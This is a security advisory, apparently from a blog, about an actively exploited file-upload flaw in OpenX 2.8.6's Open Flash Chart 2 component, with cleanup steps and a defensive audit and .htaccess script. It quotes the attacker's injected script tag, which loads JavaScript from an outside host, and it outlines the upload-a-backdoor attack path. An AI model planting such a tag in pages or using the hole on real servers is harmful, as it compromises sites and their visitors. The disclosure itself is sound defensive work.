Critical vulnerability in OpenX 2.8.6 & Open Flash Chart 2

There is a critical security flaw in OpenX 2.8.6 (and 2.8.5 and probably several earlier versions) which allows attackers to gain control of the webserver account and thus the adserver. The security hole is being actively exploited in the wild (as I learned the hard way). It seems that this hole is only known to attackers (in the OpenX context) at the moment, since I was not able to find any warning or other reference to it.

The problem lies in the following file:

/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php

The file ships with the video plugin. It is a component of Open Flash Chart 2 which is already known to be vulnerable. Basically, it allows an attacker to upload any file to the server including executables. This way, the attacker uploads a php backdoor and gains full access to the webserver account. From there he can (amongst other things) take control over the OpenX installation.

In our case, the attacker created a new admin user in the OpenX database called “root”. Interestingly, this user was not shown anywhere in the user accounts. But it did show up in the user log when he appended the following malicious script to one of our ad zones:

<script type="text/javascript" src="http://keyserveronline.com:8080/File.js"></script>

Interestingly, this vulnerability is also still present in the latest version of Open Flash Chart 2. It wouldn’t be hard to fix, but seemingly no one has bothered to release a fix yet. Me neither, since I do not need this component. A simple workaround is to delete ofc_upload_image.php. The core features of OpenX should not be affected, since this file seems to be connected to reports of the video plugin and might even be unused (since it is part of a whole library). Alternatively, access to the file can be restricted via htaccess to trusted users.

I highly recommend doing this immediately, since this vulnerability is being actively exploited.

Also check for signs of an already installed backdoor. In our case, the attacker closed the vulnerability himself (presumably so that no one else can take control over his loot), so take a look at the file before deleting it and compare it with the one that ships with OpenX. If it has been edited, you have probably already been hacked and a backdoor is installed.
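The check and the htaccess workaround described above, as an added shell script that is not part of the original post. It assumes the OpenX install root is passed as the first argument and that a pristine ofc_upload_image.php extracted from a trusted OpenX download is passed as the second; the Apache 2.2 `Order/Deny/Allow` syntax is used for the restriction.

```shell
#!/bin/sh
# Added example (not from the original post): audit an OpenX install for the
# Open Flash Chart 2 upload script and apply the htaccess workaround.
# Assumptions: $1 is the directory holding /www, $2 is a pristine copy of
# ofc_upload_image.php taken from a trusted OpenX tarball.

OFC_REL_PATH="www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php"

# Returns 0 if the script is absent (workaround applied), 1 if it is present
# and byte-identical to the trusted copy (still vulnerable), 2 if it is present
# but differs (an attacker may already have edited it; treat as compromised).
check_ofc_upload() {
    root="$1"; reference="$2"
    target="$root/$OFC_REL_PATH"
    if [ ! -f "$target" ]; then
        echo "absent: $target (workaround applied)"
        return 0
    fi
    if cmp -s "$target" "$reference"; then
        echo "unmodified: $target (still vulnerable, remove or restrict it)"
        return 1
    fi
    echo "MODIFIED: $target (possible backdoor, diff it against the trusted copy)"
    return 2
}

# Writes a .htaccess beside the script that denies it to everyone except the
# addresses given as extra arguments (Apache 2.2 Order/Deny/Allow syntax).
restrict_ofc_upload() {
    root="$1"; shift
    dir="$root/$(dirname "$OFC_REL_PATH")"
    htaccess="$dir/.htaccess"
    {
        echo "<Files ofc_upload_image.php>"
        echo "    Order deny,allow"
        echo "    Deny from all"
        for addr in "$@"; do echo "    Allow from $addr"; done
        echo "</Files>"
    } > "$htaccess"
    echo "wrote $htaccess"
}

# Usage: sh audit_ofc.sh /var/www/openx /tmp/trusted/ofc_upload_image.php
if [ $# -eq 2 ]; then
    check_ofc_upload "$1" "$2"
fi
```

A modified file is the stronger signal: compare it against the trusted copy before deleting it, and treat the host as compromised if the difference is anything but whitespace.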

What to do once the server has been hacked (Update 11.9.2010)

If you think your server has been compromised, you need to make sure that you get rid of all backdoors that might have been hidden in your system. Finding a backdoor in a compromised OpenX is tricky at best, so better get rid of the original installation completely.

Re-install OpenX and apply the fix mentioned above. Do not keep any files of the old installation. Delete or archive everything that you did not install freshly from a trusted source.

Check your database. Take a look at the table ox_users and delete every entry that does not represent a trusted user. Check the prepend and append fields of all banners and zones. Remove suspicious code.

Change your passwords.

If you want to be absolutely sure, you would have to re-install the whole server, because it might have been rooted. But if your server was configured safely and did not contain any vulnerabilities that can be exploited by local users, the chances of this are moderately low. Decide for yourself if you want to take this time-consuming measure.